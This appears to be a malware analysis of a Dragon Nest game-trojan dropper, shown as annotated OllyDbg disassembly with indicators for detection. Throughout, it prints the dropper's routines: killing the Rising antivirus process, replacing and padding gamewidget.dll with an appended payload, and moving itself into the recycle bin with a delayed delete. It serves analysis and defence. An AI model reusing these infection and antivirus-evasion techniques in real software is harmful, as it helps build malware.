只分析了exe,感染的dll下次分析
exe
去除启动时候的小漏斗
;-----------------------------------------------------------------------
; Entry routine, part 1 (the routine continues in the next listing and
; ends at the "retn 10" at 00401896). OllyDbg trace, x86-32, stdcall
; Win32 API calls (args pushed right-to-left, callee cleans).
; Saves ebx/ebp/esi/edi, posts a WM_NULL to its own thread and pulls it
; straight back with GetMessageA. Author's heading: "remove the small
; hourglass at startup" - Windows drops the app-starting cursor once the
; process has pumped a message, so this only hides the launch.
; From 004017D3 on ebx == 0; it is reused as the 0/NULL constant in
; nearly every later listing on this page.
;-----------------------------------------------------------------------
004017C9 |. 53 push ebx                                   ; save callee-saved regs
004017CA |. 55 push ebp
004017CB |. 56 push esi
004017CC |. 57 push edi
004017CD |. FF15 AC104000 call dword ptr [<&USER32.GetInputStat>; [GetInputState ; result is not used
004017D3 |. 33DB xor ebx, ebx                             ; ebx = 0 for the rest of the routine
004017D5 |. 53 push ebx ; /lParam => 0
004017D6 |. 53 push ebx ; |wParam => 0
004017D7 |. 53 push ebx ; |Message => WM_NULL
004017D8 |. FF15 64104000 call dword ptr [<&KERNEL32.GetCurrent>; |[GetCurrentThreadId
004017DE |. 50 push eax ; |ThreadId                       ; posts to its own thread
004017DF |. FF15 B0104000 call dword ptr [<&USER32.PostThreadMe>; PostThreadMessageA
004017E5 |. 53 push ebx ; /MsgFilterMax => 0
004017E6 |. 53 push ebx ; |MsgFilterMin => 0
004017E7 |. 8D4424 1C lea eax, dword ptr [esp+1C] ; |    ; MSG struct on the stack
004017EB |. 53 push ebx ; |hWnd => NULL
004017EC |. 50 push eax ; |pMsg
004017ED |. FF15 B4104000 call dword ptr [<&USER32.GetMessageA>>; GetMessageA ; receives the WM_NULL just posted
读取附加数据
;-----------------------------------------------------------------------
; Entry routine, part 2: enumerate drives, then locate and load the data
; appended to the executable's own file.
; Layout inferred from the two FILE_END seeks below: the file ends with
; a payload of N bytes followed by a 0x1C4-byte trailer. The trailer is
; read into 00401A20..00401BE3, so [401BE0] (= 00401A20 + 0x1C0) is the
; trailer's last dword and is used as N.
; Stack: the MAX_PATH buffer zeroed at 00401809..00401816 receives the
; module's own path; [esp+10] at 0040185A is the bytes-read dword.
; Triage notes: N is not bounded before "operator new" / ReadFile, and
; neither ReadFile result is checked. While N == 0 the loop at 00401833
; re-opens the file once per second indefinitely.
;-----------------------------------------------------------------------
004017F8 |. 68 1C284000 push 0040281C ; /Buffer = ctfmon.0040281C   ; drive list, walked in the scan loop below
004017FD |. 56 push esi ; |BufSize => 104 (260.)
004017FE |. FF15 60104000 call dword ptr [<&KERNEL32.GetLogical>; GetLogicalDriveStringsA
00401804 |. 6A 40 push 40 ; (author: get the drives - refers to the call above)
00401806 |. 33C0 xor eax, eax                             ; 0x40 dwords + word + byte = 259 zero bytes
00401808 |. 59 pop ecx
00401809 |. 8D7C24 31 lea edi, dword ptr [esp+31]
0040180D |. 885C24 30 mov byte ptr [esp+30], bl           ; plus the first byte: a 260-byte (MAX_PATH) buffer
00401811 |. 56 push esi ; /BufSize => 104 (260.)
00401812 |. F3:AB rep stos dword ptr es:[edi] ; |
00401814 |. 66:AB stos word ptr es:[edi] ; |
00401816 |. AA stos byte ptr es:[edi] ; |
00401817 |. 8D4424 34 lea eax, dword ptr [esp+34] ; |
0040181B |. 895C24 14 mov dword ptr [esp+14], ebx ; |
0040181F |. 50 push eax ; |PathBuffer
00401820 |. 53 push ebx ; |hModule => NULL
00401821 |. FF15 48104000 call dword ptr [<&KERNEL32.GetModuleF>; GetModuleFileNameA
00401827 |. 8B3D 5C104000 mov edi, dword ptr [<&KERNEL32.SetFi>; (author: get own path - refers to the call above) edi = SetFilePointer
0040182D |. 8B2D 58104000 mov ebp, dword ptr [<&KERNEL32.ReadF>; kernel32.ReadFile ; ebp = ReadFile
00401833 |> 53 /push ebx ; /hTemplateFile                 ; retry loop head
00401834 |. 53 |push ebx ; |Attributes
00401835 |. 6A 03 |push 3 ; |Mode = OPEN_EXISTING
00401837 |. 53 |push ebx ; |pSecurity
00401838 |. 53 |push ebx ; |ShareMode                     ; ShareMode 0: exclusive open of its own image
00401839 |. 8D4424 44 |lea eax, dword ptr [esp+44] ; |
0040183D |. 68 00000080 |push 80000000 ; |Access = GENERIC_READ
00401842 |. 50 |push eax ; |FileName
00401843 |. FF15 28104000 |call dword ptr [<&KERNEL32.CreateFil>; CreateFileA
00401849 |. 8BF0 |mov esi, eax ; (author: open itself)
0040184B |. 3BF3 |cmp esi, ebx                            ; NOTE: compares against 0, not INVALID_HANDLE_VALUE (-1)
0040184D |. 74 3B |je short 0040188A
0040184F |. 6A 02 |push 2                                 ; FILE_END
00401851 |. 53 |push ebx
00401852 |. 68 3CFEFFFF |push -1C4                        ; seek to 0x1C4 bytes before EOF
00401857 |. 56 |push esi
00401858 |. FFD7 |call edi ; kernel32.SetFilePointer
0040185A |. 8D4424 10 |lea eax, dword ptr [esp+10] ; (author: set the pointer)
0040185E |. 53 |push ebx
0040185F |. 50 |push eax
00401860 |. 68 C4010000 |push 1C4                         ; read the 0x1C4-byte trailer
00401865 |. 68 201A4000 |push 00401A20                    ; into the static buffer 00401A20
0040186A |. 56 |push esi
0040186B |. FFD5 |call ebp ; kernel32.ReadFile            ; return value not checked
0040186D |. A1 E01B4000 |mov eax, dword ptr [401BE0] ; (author: read appended data) eax = N = last dword of the trailer
00401872 |. 3BC3 |cmp eax, ebx
00401874 |. 77 23 |ja short 00401899                      ; unsigned: any nonzero N proceeds, no upper bound
00401876 |. 68 E8030000 |push 3E8 ; /Timeout = 1000. ms
0040187B |. FF15 44104000 |call dword ptr [<&KERNEL32.Sleep>] ; Sleep
00401881 |. 56 |push esi ; /hObject
00401882 |. FF15 20104000 |call dword ptr [<&KERNEL32.CloseHand>; CloseHandle
00401888 |.^ EB A9 jmp short 00401833 ; (author: on read failure, go back) - retries forever while N == 0
0040188A |> 5F pop edi                                    ; CreateFileA returned 0: leave with eax = 0
0040188B |. 5E pop esi
0040188C |. 5D pop ebp
0040188D |. 33C0 xor eax, eax
0040188F |. 5B pop ebx
00401890 |. 81C4 2C030000 add esp, 32C
00401896 |. C2 1000 retn 10                               ; 4 stack args: consistent with a WinMain-style entry (assumption)
00401899 |> 50 push eax                                   ; operator new(N), N unbounded
0040189A |. E8 69010000 call <jmp.&MSVCRT.operator new>
0040189F |. A3 20294000 mov dword ptr [402920], eax       ; [402920] = payload buffer (freed at 004019B6)
004018A4 |. B8 3CFEFFFF mov eax, -1C4
004018A9 |. 2B05 E01B4000 sub eax, dword ptr [401BE0]     ; eax = -(0x1C4 + N)
004018AF |. 59 pop ecx
004018B0 |. 6A 02 push 2                                  ; FILE_END
004018B2 |. 53 push ebx
004018B3 |. 50 push eax                                   ; seek to the start of the payload
004018B4 |. 56 push esi
004018B5 |. FFD7 call edi ; kernel32.SetFilePointer
004018B7 |. 8D4424 10 lea eax, dword ptr [esp+10] ; (author: set the file pointer)
004018BB |. 53 push ebx
004018BC |. 50 push eax
004018BD |. FF35 E01B4000 push dword ptr [401BE0]         ; N bytes
004018C3 |. FF35 20294000 push dword ptr [402920]         ; into the heap buffer
004018C9 |. 56 push esi
004018CA |. FFD5 call ebp ; kernel32.ReadFile             ; return value not checked
004018CC |. 56 push esi ; /(author: read appended data)
004018CD |. FF15 20104000 call dword ptr [<&KERNEL32.CloseHandl>; CloseHandle
004018D3 |. E8 4CF9FFFF call 00401224 ; (author: release handle - refers to CloseHandle above) 00401224 is likely the terminate-process routine seen below; what it acts on here is not visible
查找龙之谷进程,找到则结束该进程
;-----------------------------------------------------------------------
; DWORD find_process(const char *exeName)          004011C0..00401223
; Walks a TH32CS_SNAPPROCESS snapshot and returns the PID of the first
; entry whose szExeFile matches exeName case-insensitively (_stricmp),
; or 0 if none. Called with "RavMonD.exe" (Rising AV) at 004018E8 and
; 004019C2 in the listings below.
; Frame: [ebp-128] = PROCESSENTRY32 (dwSize = 0x128; th32ProcessID at
; [ebp-120] = +8; szExeFile at [ebp-104] = +0x24).
; Notes: the entry returned by Process32First is never compared - only
; entries fetched by Process32Next are - and the snapshot handle in esi
; is not closed on either exit path shown here (handle leak per call).
; The trailing fragment 0040122F..00401243 is the tail of a second
; routine (its start, 00401224, is called from the other listings): it
; opens the PID in eax (set by the unshown 00401224..0040122E) with
; access 1 = PROCESS_TERMINATE and terminates it; that process handle
; is not closed either within the shown fragment.
;-----------------------------------------------------------------------
004011C0 /$ 55 push ebp ; kernel32.ReadFile               ; (OllyDbg stale annotation; ebp is just being saved)
004011C1 |. 8BEC mov ebp, esp
004011C3 |. 81EC 28010000 sub esp, 128                    ; sizeof(PROCESSENTRY32)
004011C9 |. 56 push esi
004011CA |. 6A 00 push 0 ; /ProcessID = 0
004011CC |. 6A 02 push 2 ; |Flags = TH32CS_SNAPPROCESS
004011CE |. E8 23080000 call <jmp.&KERNEL32.CreateToolhelp32S>; CreateToolhelp32Snapshot
004011D3 |. 8BF0 mov esi, eax                             ; esi = snapshot handle (never closed here)
004011D5 |. 8D85 D8FEFFFF lea eax, dword ptr [ebp-128]
004011DB |. 50 push eax ; /lppe
004011DC |. 56 push esi ; |hSnapshot
004011DD |. C785 D8FEFFFF>mov dword ptr [ebp-128], 128 ; | ; pe.dwSize = 0x128
004011E7 |. E8 04080000 call <jmp.&KERNEL32.Process32First> ; Process32First
004011EC |. 85C0 test eax, eax
004011EE |. 74 2F je short 0040121F
004011F0 |> 8D85 D8FEFFFF /lea eax, dword ptr [ebp-128]   ; loop: first entry skipped, compare starts at Process32Next
004011F6 |. 50 |push eax ; /lppe
004011F7 |. 56 |push esi ; |hSnapshot
004011F8 |. E8 ED070000 |call <jmp.&KERNEL32.Process32Next> ; Process32Next
004011FD |. 85C0 |test eax, eax
004011FF |. 74 1E |je short 0040121F                      ; end of list -> return 0
00401201 |. 8D85 FCFEFFFF |lea eax, dword ptr [ebp-104]   ; pe.szExeFile
00401207 |. 50 |push eax ; /s2
00401208 |. FF75 08 |push dword ptr [ebp+8] ; |s1         ; exeName argument
0040120B |. FF15 9C104000 |call dword ptr [<&MSVCRT._stricmp>] ; _stricmp ; case-insensitive name match
00401211 |. 59 |pop ecx ; (author: look for the Dragon Nest process)
00401212 |. 85C0 |test eax, eax
00401214 |. 59 |pop ecx
00401215 |.^ 75 D9 jnz short 004011F0
00401217 |. 8B85 E0FEFFFF mov eax, dword ptr [ebp-120]    ; return pe.th32ProcessID
0040121D |. EB 02 jmp short 00401221
0040121F |> 33C0 xor eax, eax                             ; not found -> 0
00401221 |> 5E pop esi
00401222 |. C9 leave
00401223 . C3 retn
0040122F |. 50 push eax ; /ProcessId                      ; second routine, tail only; eax = PID
00401230 |. 6A 00 push 0 ; |Inheritable = FALSE
00401232 |. 6A 01 push 1 ; |Access = TERMINATE
00401234 |. FF15 10104000 call dword ptr [<&KERNEL32.OpenProces>; OpenProcess
0040123A |. 6A 00 push 0 ; /ExitCode = 0
0040123C |. 50 push eax ; |hProcess                       ; OpenProcess result used unchecked
0040123D |. FF15 3C104000 call dword ptr [<&KERNEL32.TerminateP>; TerminateProcess
00401243 . C3 retn ; (author: if it exists, terminate the process)
游戏目录下原来的gamewidget.dll拷贝DragonNestRes.dll,然后感染gamewidget.dll并复制一份midimap.dll
;-----------------------------------------------------------------------
; Infection path, four non-contiguous fragments as excerpted by the
; author (enclosing routines start/end outside this listing):
;  004015C2..00401623  read HKLM\SOFTWARE\sndadn\MainProg into the
;                      MAX_PATH buffer at [ebp-110] to find the game's
;                      main program. Backslashes in the OllyDbg string
;                      comments appear to have been stripped by the blog
;                      rendering ("SOFTWAREsndadn"). This registry key
;                      is a usable indicator of what the dropper targets.
;  004013B3..004013D4  if DragonNestRes.dll ([ebp-20C]) does not exist
;                      (GetFileAttributesA == -1), CopyFileA the
;                      original gamewidget.dll ([ebp-108]) to it, i.e.
;                      the real DLL is preserved under a new name.
;  00401299..004012B6  head of a helper: DeleteFileA(path), then
;                      _access(path, 0) to confirm the file is gone.
;  00401401..004014C2  create the replacement gamewidget.dll
;                      (CREATE_NEW, GENERIC_WRITE, ShareMode 0) and fill
;                      it: the payload [402920] of [401BE0] bytes is
;                      written once, then 0x7D0 = 2000 more times
;                      (counter in [ebp+C]), then the 0x1C4-byte trailer
;                      from 00401A20 - the same trailer format the
;                      dropper reads from its own tail. With [401BE0] =
;                      0x2A00 as shown in this trace the result is
;                      2001 * 10752 + 452 bytes (~21 MB). The finished
;                      file is then copied to midimap.dll (author's
;                      note).
; Detection notes: no WriteFile result is checked; the DLL is a plain
; repetition of one 0x2A00-byte block, so it is highly compressible and
; its first [401BE0] bytes are byte-identical to the dropper's appended
; payload.
;-----------------------------------------------------------------------
004015C2 |. 50 push eax ; /pHandle                        ; -> [ebp-4] (used as hKey at 0040161A)
004015C3 |. 33DB xor ebx, ebx ; |
004015C5 |. 68 19000200 push 20019 ; |Access = KEY_READ
004015CA |. 53 push ebx ; |Reserved => 0
004015CB |. 68 64114000 push 00401164 ; |Subkey = "SOFTWAREsndadn"
004015D0 |. 68 02000080 push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
004015D5 |. FF15 08104000 call dword ptr [<&ADVAPI32.RegOpenKey>; RegOpenKeyExA
004015DB |. 85C0 test eax, eax ; (author: read HKEY_LOCAL_MACHINE\SOFTWARE\sndadn)
004015DD |. /0F85 8C000000 jnz 0040166F ; (author: if it cannot be read, return)
004015E3 |. |6A 40 push 40                                ; zero a 260-byte buffer at [ebp-110]
004015E5 |. |8DBD F1FEFFFF lea edi, dword ptr [ebp-10F]
004015EB |. |59 pop ecx
004015EC |. |889D F0FEFFFF mov byte ptr [ebp-110], bl
004015F2 |. |F3:AB rep stos dword ptr es:[edi]
004015F4 |. |66:AB stos word ptr es:[edi]
004015F6 |. |AA stos byte ptr es:[edi]
004015F7 |. |8D45 F8 lea eax, dword ptr [ebp-8]
004015FA |. |C745 F4 01000>mov dword ptr [ebp-C], 1       ; expected type REG_SZ (1)
00401601 |. |50 push eax ; /pBufSize
00401602 |. |8D85 F0FEFFFF lea eax, dword ptr [ebp-110] ; |
00401608 |. |50 push eax ; |Buffer
00401609 |. |8D45 F4 lea eax, dword ptr [ebp-C] ; |
0040160C |. |50 push eax ; |pValueType
0040160D |. |53 push ebx ; |Reserved => NULL
0040160E |. |68 58114000 push 00401158 ; |ValueName = "MainProg"
00401613 |. |C745 F8 04010>mov dword ptr [ebp-8], 104 ; | ; buffer size = MAX_PATH
0040161A |. |FF75 FC push dword ptr [ebp-4] ; |hKey
0040161D |. |FF15 04104000 call dword ptr [<&ADVAPI32.RegQueryVa>; RegQueryValueExA
00401623 |. |85C0 test eax, eax ; (author: read the path)
004013B3 |. 50 push eax ; /FileName                       ; eax = DragonNestRes.dll path (see 004013BF)
004013B4 |. FF15 30104000 call dword ptr [<&KERNEL32.GetFileAtt>; GetFileAttributesA
004013BA |. 83F8 FF cmp eax, -1 ; (author: get the file attributes, to test whether DragonNestRes.dll exists)
004013BD |. 75 15 jnz short 004013D4                      ; exists -> skip the copy (already infected once)
004013BF |. 8D85 F4FDFFFF lea eax, dword ptr [ebp-20C]
004013C5 |. 53 push ebx ; /FailIfExists
004013C6 |. 50 push eax ; |NewFileName
004013C7 |. 8D85 F8FEFFFF lea eax, dword ptr [ebp-108] ; |
004013CD |. 50 push eax ; |ExistingFileName
004013CE |. FF15 2C104000 call dword ptr [<&KERNEL32.CopyFileA>>; CopyFileA
004013D4 |> 8D85 F8FEFFFF lea eax, dword ptr [ebp-108] ; (author: if it does not exist, copy the original gamewidget.dll in the game directory to DragonNestRes.dll)
00401299 /$ 55 push ebp                                   ; helper: delete a file and verify
0040129A |. 8BEC mov ebp, esp
0040129C |. 81EC 08020000 sub esp, 208
004012A2 |. 56 push esi
004012A3 |. 8B75 08 mov esi, dword ptr [ebp+8]            ; esi = path argument
004012A6 |. 56 push esi ; /FileName
004012A7 |. FF15 1C104000 call dword ptr [<&KERNEL32.DeleteFile>; DeleteFileA
004012AD |. 6A 00 push 0 ; /(author: delete gamewidget.dll)
004012AF |. 56 push esi ; |path
004012B0 |. FF15 A0104000 call dword ptr [<&MSVCRT._access>] ; _access ; mode 0 = existence check
004012B6 |. 59 pop ecx ; (author: check whether the delete succeeded)
00401401 |. 53 push ebx ; /hTemplateFile                  ; create the replacement DLL
00401402 |. 53 push ebx ; |Attributes
00401403 |. 6A 01 push 1 ; |Mode = CREATE_NEW
00401405 |. 53 push ebx ; |pSecurity
00401406 |. 53 push ebx ; |ShareMode
00401407 |. 68 00000040 push 40000000 ; |Access = GENERIC_WRITE
0040140C |. 50 push eax ; |FileName
0040140D |. FF15 28104000 call dword ptr [<&KERNEL32.CreateFile>; CreateFileA
00401413 |. 8BF8 mov edi, eax ; (author: create the new gamewidget.dll)
00401415 |. 3BFB cmp edi, ebx                             ; NOTE: compares against 0, not INVALID_HANDLE_VALUE (-1)
00401417 |. 75 07 jnz short 00401420
00401419 |. 33C0 xor eax, eax
0040141B |. E9 A5000000 jmp 004014C5                      ; failure -> return 0
00401420 |> 8D45 FC lea eax, dword ptr [ebp-4]            ; [ebp-4] = bytes written
00401423 |. 53 push ebx ; /pOverlapped
00401424 |. 50 push eax ; |pBytesWritten
00401425 |. 8B35 24104000 mov esi, dword ptr [<&KERNEL32.Write>; |kernel32.WriteFile
0040142B |. FF35 E01B4000 push dword ptr [401BE0] ; |nBytesToWrite = 2A00 (10752.)
00401431 |. FF35 20294000 push dword ptr [402920] ; |Buffer = 003D4380 ; the payload read from the dropper's tail
00401437 |. 57 push edi ; |hFile
00401438 |. FFD6 call esi ; WriteFile                     ; first copy of the payload; result unchecked
0040143A |. C745 0C D0070>mov dword ptr [ebp+C], 7D0 ; (author: write the DLL) ; loop counter = 2000 (reuses the 2nd arg slot)
00401441 |> /8D45 FC /lea eax, dword ptr [ebp-4]          ; padding loop: 2000 more copies of the same block
00401444 |. |53 |push ebx
00401445 |. |50 |push eax
00401446 |. |FF35 E01B4000 |push dword ptr [401BE0]
0040144C |. |FF35 20294000 |push dword ptr [402920]
00401452 |. |57 |push edi
00401453 |. |FFD6 |call esi
00401455 |. |FF4D 0C |dec dword ptr [ebp+C]
00401458 |.^75 E7 jnz short 00401441 ; (author: repeat the write 2000 more times to increase the file size)
0040145A |. 8D45 FC lea eax, dword ptr [ebp-4]
0040145D |. 53 push ebx
0040145E |. 50 push eax
0040145F |. 68 C4010000 push 1C4                          ; append the 0x1C4-byte trailer
00401464 |. 68 201A4000 push 00401A20                     ; same static trailer buffer the dropper filled
00401469 |. 57 push edi
0040146A |. FFD6 call esi ; kernel32.WriteFile
0040146C |. 57 push edi ; /(author: write the appended data)
0040146D |. FF15 20104000 call dword ptr [<&KERNEL32.CloseHandl>; CloseHandle
00401473 |. 6A 40 push 40 ; (author: release the handle - refers to CloseHandle above)
004014AD |. 8D85 F0FCFFFF lea eax, dword ptr [ebp-310]    ; midimap.dll path per author's note
004014B3 |. 53 push ebx ; /FailIfExists
004014B4 |. 50 push eax ; |NewFileName
004014B5 |. 8D85 F8FEFFFF lea eax, dword ptr [ebp-108] ; |
004014BB |. 50 push eax ; |ExistingFileName = "C:Program Files?,A2,"",B4,"笸鏫龙之谷gamewidget.dll"
004014BC |. FF15 2C104000 call dword ptr [<&KERNEL32.CopyFileA>>; CopyFileA
004014C2 |. 6A 01 push 1 ; (author: copy the already-replaced gamewidget.dll to midimap.dll)
再次感染
;-----------------------------------------------------------------------
; Second way of locating the game (author: "infect again"): enumerate
; HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache (backslashes
; stripped by the blog rendering) and look for a value whose data
; contains "dragonnest" (strstr, case-sensitive). MUICache value names
; are typically full paths of programs the user has run, so the matching
; value name in [ebp-11C] gives the game's location without the
; HKLM\SOFTWARE\sndadn key. What is done with that path is outside this
; listing.
; Loop state: [ebp-4] = enumeration index, [ebp-C] = hKey,
; [ebp-11C] = value name (MAX_PATH), [ebp-10] = its size (0x104),
; [ebp-428] = value data from RegEnumValueA, [ebp-14] = its size,
; [ebp-324] = the same value re-read with RegQueryValueExA, [ebp-18] =
; its size, [ebp-8] = value type. Enumeration ends (jnz 004017BC) when
; RegEnumValueA fails; a RegQueryValueExA failure or a non-matching
; value simply advances to the next index.
;-----------------------------------------------------------------------
00401684 |. 50 push eax ; /pHandle                        ; -> [ebp-C]
00401685 |. 33DB xor ebx, ebx ; |
00401687 |. 68 19000200 push 20019 ; |Access = KEY_READ
0040168C |. 53 push ebx ; |Reserved => 0
0040168D |. 68 84114000 push 00401184 ; |Subkey = "SoftwareMicrosoftWindowsShellNoRoamMUICache"
00401692 |. 68 01000080 push 80000001 ; |hKey = HKEY_CURRENT_USER
00401697 |. FF15 08104000 call dword ptr [<&ADVAPI32.RegOpenKey>; RegOpenKeyExA
0040169D |. 85C0 test eax, eax ; (author: open HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache)
0040169F |. /0F85 17010000 jnz 004017BC                   ; key missing -> give up this vector
004016A5 |. |895D FC mov dword ptr [ebp-4], ebx           ; index = 0
004016A8 |. |BE 04010000 mov esi, 104                     ; esi = MAX_PATH, reused as every buffer size
004016AD |> |6A 40 /push 40                               ; loop head: zero [ebp-11C] (260 bytes)
004016AF |. |33C0 |xor eax, eax
004016B1 |. |59 |pop ecx
004016B2 |. |8DBD E5FEFFFF |lea edi, dword ptr [ebp-11B]
004016B8 |. |889D E4FEFFFF |mov byte ptr [ebp-11C], bl
004016BE |. |6A 40 |push 40
004016C0 |. |F3:AB |rep stos dword ptr es:[edi]
004016C2 |. |66:AB |stos word ptr es:[edi]
004016C4 |. |AA |stos byte ptr es:[edi]
004016C5 |. |59 |pop ecx
004016C6 |. |33C0 |xor eax, eax                           ; then zero [ebp-428] (260 bytes, interleaved below)
004016C8 |. |8DBD D9FBFFFF |lea edi, dword ptr [ebp-427]
004016CE |. |889D D8FBFFFF |mov byte ptr [ebp-428], bl
004016D4 |. |F3:AB |rep stos dword ptr es:[edi]
004016D6 |. |8D4D EC |lea ecx, dword ptr [ebp-14]
004016D9 |. |8975 F0 |mov dword ptr [ebp-10], esi         ; cchValueName = 0x104
004016DC |. |51 |push ecx ; /pBufSize
004016DD |. |8D8D D8FBFFFF |lea ecx, dword ptr [ebp-428] ; |
004016E3 |. |51 |push ecx ; |Buffer
004016E4 |. |8D4D F8 |lea ecx, dword ptr [ebp-8] ; |
004016E7 |. |66:AB |stos word ptr es:[edi] ; |
004016E9 |. |51 |push ecx ; |pValueType
004016EA |. |8D4D F0 |lea ecx, dword ptr [ebp-10] ; |
004016ED |. |53 |push ebx ; |Reserved
004016EE |. |51 |push ecx ; |pValueCount
004016EF |. |AA |stos byte ptr es:[edi] ; |
004016F0 |. |8B45 FC |mov eax, dword ptr [ebp-4] ; |      ; eax = current index
004016F3 |. |FF45 FC |inc dword ptr [ebp-4] ; |           ; post-increment for the next pass
004016F6 |. |8D8D E4FEFFFF |lea ecx, dword ptr [ebp-11C] ; |
004016FC |. |C745 F8 01000>|mov dword ptr [ebp-8], 1 ; |
00401703 |. |51 |push ecx ; |Value                        ; receives the value name (a program path)
00401704 |. |50 |push eax ; |Index
00401705 |. |FF75 F4 |push dword ptr [ebp-C] ; |hKey
00401708 |. |8975 EC |mov dword ptr [ebp-14], esi ; |     ; cbData = 0x104
0040170B |. |FF15 00104000 |call dword ptr [<&ADVAPI32.RegEnumVa>; RegEnumValueA
00401711 |. |85C0 |test eax, eax ; (author: read the value)
00401713 |. |0F85 A3000000 |jnz 004017BC                  ; no more values -> done
00401719 |. |6A 40 |push 40                               ; zero [ebp-324] (260 bytes)
0040171B |. |8DBD DDFCFFFF |lea edi, dword ptr [ebp-323]
00401721 |. |59 |pop ecx
00401722 |. |889D DCFCFFFF |mov byte ptr [ebp-324], bl
00401728 |. |F3:AB |rep stos dword ptr es:[edi]
0040172A |. |66:AB |stos word ptr es:[edi]
0040172C |. |AA |stos byte ptr es:[edi]
0040172D |. |8D45 E8 |lea eax, dword ptr [ebp-18]
00401730 |. |8975 E8 |mov dword ptr [ebp-18], esi         ; cbData = 0x104
00401733 |. |50 |push eax ; /pBufSize
00401734 |. |8D85 DCFCFFFF |lea eax, dword ptr [ebp-324] ; |
0040173A |. |50 |push eax ; |Buffer
0040173B |. |8D45 F8 |lea eax, dword ptr [ebp-8] ; |
0040173E |. |50 |push eax ; |pValueType
0040173F |. |8D85 E4FEFFFF |lea eax, dword ptr [ebp-11C] ; |
00401745 |. |53 |push ebx ; |Reserved
00401746 |. |50 |push eax ; |ValueName                    ; re-read the value just enumerated, by name
00401747 |. |FF75 F4 |push dword ptr [ebp-C] ; |hKey
0040174A |. |FF15 04104000 |call dword ptr [<&ADVAPI32.RegQueryV>; RegQueryValueExA
00401750 |. |85C0 |test eax, eax ; (author: read the LangID) - the data read here is the MUICache value data; presumably the program's display name, confirm
00401752 |.^|0F85 55FFFFFF |jnz 004016AD                  ; query failed -> next value
00401758 |. |8D85 DCFCFFFF |lea eax, dword ptr [ebp-324]
0040175E |. |68 78114000 |push 00401178 ; /s2 = "dragonnest"
00401763 |. |50 |push eax ; |s1 = "?,AC,"?,B6,"终",B6,"?
00401764 |. |FF15 8C104000 |call dword ptr [<&MSVCRT.strstr>] ; strstr ; case-sensitive substring test
0040176A |. |59 |pop ecx ; (author: look for an entry whose value is dragonnest)
0040176B |. |85C0 |test eax, eax
0040176D |. |59 |pop ecx
0040176E |.^|0F84 39FFFFFF je 004016AD ; no match -> next value; on a match fall through (author: "... infects again ...")
查找瑞星进程,没找到则把自身移动到回收站,随机文件名
;-----------------------------------------------------------------------
; Anti-AV check and self-relocation into the recycle-bin directory.
; 004018E2..004018E8 is the call site in the entry routine (ebp =
; "RavMonD.exe", the Rising AV daemon, kept in ebp for a second check
; at 004019C2). 00401511..004015A9 is the body reached when RavMonD.exe
; is NOT running (via call 004014E8 at 004019CD in the last listing -
; presumably this routine, confirm).
; Builds "<drive>:\RECYCLER\<GetTickCount>.tmp" (backslashes stripped by
; the blog rendering) with wsprintfA; %c is the first byte of its own
; path [ebp-104], so the "random" name is just the boot tick count.
; If DeleteFileA on that path fails with GetLastError == 3
; (ERROR_PATH_NOT_FOUND - no RECYCLER directory on that volume) it
; falls back to "<drive>:\Recycled\<tick>.tmp". MoveFileA then moves the
; running executable there, and MoveFileExA(path, NULL, 4 =
; MOVEFILE_DELAY_UNTIL_REBOOT) schedules the moved copy for deletion at
; next boot. Detection: the delayed delete is recorded in the
; PendingFileRenameOperations value under HKLM\SYSTEM\CurrentControlSet\
; Control\Session Manager, and a *.tmp in RECYCLER/Recycled that is a
; PE is itself an indicator.
;-----------------------------------------------------------------------
004018E2 |. BD B4114000 mov ebp, 004011B4 ; ASCII "RavMonD.exe"
004018E7 |. 55 push ebp
004018E8 |. E8 D3F8FFFF call 004011C0 ; (author: look for RavMonD.exe; if not found, move itself to the recycle bin under a random file name) - find_process, see 004011C0 above
00401511 |. 68 04010000 push 104 ; /BufSize = 104 (260.)
00401516 |. 50 push eax ; |PathBuffer                     ; eax = [ebp-104] (see 0040152E)
00401517 |. 6A 00 push 0 ; |hModule = NULL
00401519 |. FF15 48104000 call dword ptr [<&KERNEL32.GetModuleF>; GetModuleFileNameA
0040151F |. 8B35 54104000 mov esi, dword ptr [<&KERNEL32.GetTi>; (author: get own path - refers to the call above) esi = GetTickCount
00401525 |. FFD6 call esi ; [GetTickCount
00401527 |. 50 push eax ; /(author: get the start time)   ; <%d> = tick count, the only "randomness"
00401528 |. 8B3D A8104000 mov edi, dword ptr [<&USER32.wsprint>; |USER32.wsprintfA
0040152E |. 0FBE85 FCFEFF>movsx eax, byte ptr [ebp-104] ; | ; drive letter of its own path
00401535 |. 50 push eax ; |<%c>
00401536 |. 8D85 F8FDFFFF lea eax, dword ptr [ebp-208] ; | ; [ebp-208] = destination path
0040153C |. 68 44114000 push 00401144 ; |Format = "%c:RECYCLER%d.tmp"
00401541 |. 50 push eax ; |s
00401542 |. FFD7 call edi ; wsprintfA
00401544 |. 8B1D 1C104000 mov ebx, dword ptr [<&KERNEL32.Delet>; (author: builds the path C:\RECYCLER\4143625.tmp) ebx = DeleteFileA
0040154A |. 83C4 10 add esp, 10                           ; wsprintfA is cdecl: caller pops 4 args
0040154D |. 8D85 F8FDFFFF lea eax, dword ptr [ebp-208]
00401553 |. 50 push eax ; /FileName
00401554 |. FFD3 call ebx ; DeleteFileA
00401556 |. 85C0 test eax, eax ; (author: delete the file if it already exists)
00401558 |. 75 30 jnz short 0040158A
0040155A |. FF15 50104000 call dword ptr [<&KERNEL32.GetLastErr>; [GetLastError
00401560 |. 83F8 03 cmp eax, 3                            ; ERROR_PATH_NOT_FOUND: no RECYCLER dir on this volume
00401563 |. 75 25 jnz short 0040158A                      ; any other error (e.g. file absent) -> proceed
00401565 |. FFD6 call esi
00401567 |. 50 push eax ; (author: get the start time)
00401568 |. 0FBE85 FCFEFF>movsx eax, byte ptr [ebp-104]
0040156F |. 50 push eax
00401570 |. 8D85 F8FDFFFF lea eax, dword ptr [ebp-208]
00401576 |. 68 30114000 push 00401130 ; ASCII "%c:Recycled%d.tmp"   ; fallback directory name
0040157B |. 50 push eax
0040157C |. FFD7 call edi ; wsprintfA
0040157E |. 83C4 10 add esp, 10 ; (author: builds C:\Recycled\4273328.tmp)
00401581 |. 8D85 F8FDFFFF lea eax, dword ptr [ebp-208]
00401587 |. 50 push eax
00401588 |. FFD3 call ebx                                 ; DeleteFileA on the fallback path; result ignored
0040158A |> 8D85 F8FDFFFF lea eax, dword ptr [ebp-208] ; (author: delete the file if it already exists)
00401590 |. 50 push eax ; /NewName
00401591 |. 8D85 FCFEFFFF lea eax, dword ptr [ebp-104] ; |
